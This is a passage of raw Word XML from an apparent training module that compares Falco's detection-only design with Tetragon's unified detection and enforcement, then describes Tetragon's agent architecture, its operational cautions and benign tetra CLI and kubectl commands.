        <w:t xml:space="preserve">Falco's design choice: DETECTION ONLY. Enforcement happens elsewhere (Talon, humans, external tools). This keeps Falco architecturally simple and operationally safe — it can never break your workload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon's design choice: DETECTION AND ENFORCEMENT, unified. The same policy describes what to watch for AND what to do about it. When a rule matches:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Emit an event (observability).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">OPTIONALLY take an enforcement action (block, kill, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This unification has implications — both good and bad. Understanding them is key to deploying Tetragon safely.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Why Unify?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Arguments for combined detection + enforcement:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.1 The Same Context Matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deciding whether to ALERT on an action and whether to BLOCK it uses the same data: process lineage, container context, user identity, syscall arguments. Having one engine that handles both avoids duplicated logic.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.2 Instant Response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A policy that says "alert on this and block it" does both atomically. No round-trip to userspace; no race between detection and response. The block happens in the same kernel context as the detection.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.2.3 Kubernetes-Native Policy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In Kubernetes, policies are CRDs. A TracingPolicy CRD defines both the "what to watch" and "what to do" in one place. Easier to review, version, and audit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 Why NOT Unify?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Arguments against (the Falco perspective):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.3.1 Blast Radius</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If your detection engine can BLOCK actions, a bug in the engine can break production. An overly broad rule combined with enforcement = outage. An alerting-only system is safer — worst case, you get a noisy alert.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.3.2 Maturity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Detection rules are easier to write than enforcement policies. Enforcement demands HIGH CONFIDENCE — a false positive that blocks legitimate behavior is a production incident. Detection tolerates some false positives (they just create noise).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.3.3 Kernel Requirements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enforcement requires BPF LSM (kernel 5.7+). Detection-only systems work on older kernels. Tetragon's enforcement features are unavailable on 4.x kernels.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.4 The Best-Of-Both Model</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon ADDRESSES the blast-radius concern by making enforcement OPTIONAL PER POLICY. You can deploy Tetragon with:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Most policies in DETECTION-ONLY mode (safe, tuneable).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Select high-confidence policies in ENFORCEMENT mode (actually blocking).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This maps to the maturity progression recommended in Module 7 for Falco + Talon: start with detection; graduate to enforcement only after rules are well-tuned.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.5 The Blocking Mindset Shift</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Moving from detection to enforcement requires a mindset shift:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.5.1 Enforcement = Production Change</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Deploying an enforcement policy is a PRODUCTION CHANGE. It alters runtime behavior. Review it like any other production change — code review, staging test, canary rollout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.5.2 False Positives Are Incidents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In detection, false positives = noise. In enforcement, false positives = production incident. "The policy blocked our legitimate batch job; nothing ran for 6 hours." Mitigation: tune thoroughly before enabling enforcement.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.5.3 Observability First</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Recommended pattern: deploy every policy in OBSERVABILITY MODE (audit only) for weeks before enabling ENFORCEMENT. See what it would have blocked. Confirm no legitimate behavior is caught. Then enforce.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="120" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">3.5.4 Kill Switch Matters</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When enforcement goes wrong, you need an IMMEDIATE OFF SWITCH. Tetragon policies can be disabled by editing the CRD. Ensure your on-call team knows how to do this. Practice the emergency workflow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="4472C4" w:sz="18" w:space="12"/>
        </w:pBdr>
        <w:spacing w:after="120" w:before="120"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
        </w:rPr>
        <w:t xml:space="preserve">"Enforcement is a sharp tool. Used well, it prevents real attacks. Used carelessly, it causes self-inflicted outages. The difference is operational discipline: staged rollout, observability-first, kill switches, and a team trained for emergencies."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4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="160" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tetragon Architecture</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 Components</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tetragon's deployment is more kernel-centric than Falco's:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">┌──────────────────── Kubernetes Cluster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TracingPolicy CRDs │  (user-authored rules)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applied to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Tetragon Agent (DaemonSet, per node)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Userspace:                                   │         │</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   ├─ Loads TracingPolicies                     │         │</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   ├─ Compiles to eBPF programs                 │         │</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   ├─ Manages BPF maps                          │         │</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   ├─ Process lineage tracker                   │         │</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   ├─ K8s metadata enricher                     │         │</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   └─ Event emitter (gRPC, JSON log, OTel)      │         │</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │                                                │         │</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   Kernel (via eBPF):                           │         │</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   ├─ Tracepoints / kprobes (observability)     │         │</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   ├─ BPF LSM hooks (enforcement)               │         │</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   └─ Policy evaluation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events via gRPC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                                               </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        Downstream consumers:                                   </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ─ tetra CLI (live viewing)                             </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ─ JSON log files                                        </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ─ SIEM, Elastic, etc.                                   </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ─ OpenTelemetry collectors                              </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 The Tetragon Agent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A DaemonSet pod on every node. It's the WHOLE STORY. No separate server (unlike Falco → Falcosidekick). The agent contains everything: control plane (CRD handling), compilation, enforcement, event emission.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Agent responsibilities:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WATCH CRDs. Monitors the Kubernetes API for TracingPolicy and TracingPolicyNamespaced CRDs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">COMPILE POLICIES. Translates CRD specifications into eBPF programs. Different policies → different eBPF programs loaded.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">LOAD INTO KERNEL. Attaches eBPF programs to appropriate hooks (tracepoints, kprobes, BPF LSM).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TRACK PROCESSES. Maintains a map of every process on the node — its ancestry, container context, exec history.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ENRICH EVENTS. When an eBPF program emits an event, the agent adds Kubernetes context (pod, namespace, labels).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">EMIT EVENTS. JSON-formatted events flow via gRPC to subscribers, or written to log files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MANAGE ENFORCEMENT STATE. Keeps track of which policies are in observability vs. enforcement mode.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 The tetra CLI</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">tetra is the operator's interface:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># Watch live events</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ tetra getevents -o compact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by pod</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ tetra getevents --pods webapp-7f9b</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Filter by event type</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ tetra getevents --event-types PROCESS_EXEC,PROCESS_KPROBE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Show current policies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ kubectl get tracingpolicies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ kubectl describe tracingpolicy block-etc-writes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Apply a policy</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="80" w:before="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">$ kubectl apply -f my-policy.yaml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">tetra talks to the Tetragon agent via gRPC. It's primarily for development, debugging, and small-scale operations. Production monitoring happens through the event stream to SIEM/log aggregators.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">4.4 The Event Flow</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">How a single event flows through Tetragon:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">KERNEL EVENT — a syscall or LSM hook triggers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
